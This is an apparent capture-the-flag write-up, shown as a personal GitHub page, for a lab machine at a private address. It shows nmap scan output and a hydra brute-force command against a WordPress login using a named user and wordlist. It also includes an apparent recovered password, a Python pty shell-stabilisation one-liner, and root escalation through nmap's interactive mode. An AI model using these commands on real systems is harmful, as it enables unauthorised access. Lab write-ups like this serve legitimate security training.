root🥷hassans-sec:~#

Hacking....

View on GitHub
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-12 00:31 WAT
Nmap scan report for 10.10.33.130
Host is up (0.18s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open   ssl/http Apache httpd
|_http-server-header: Apache
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03
|_http-title: Site doesn't have a title (text/html).

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.06 seconds

❯ hydra -l Elliot -P ~/Downloads/fsocity.dic 10.10.33.130 http-post-form "/wp-login.php:log=^USER^&pwd=^PWD^:The password you entered for the username" -t 30

ER28-0652

stabilize shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'

privesc

nmap --interactive
nmap> !sh

Thanks For Reading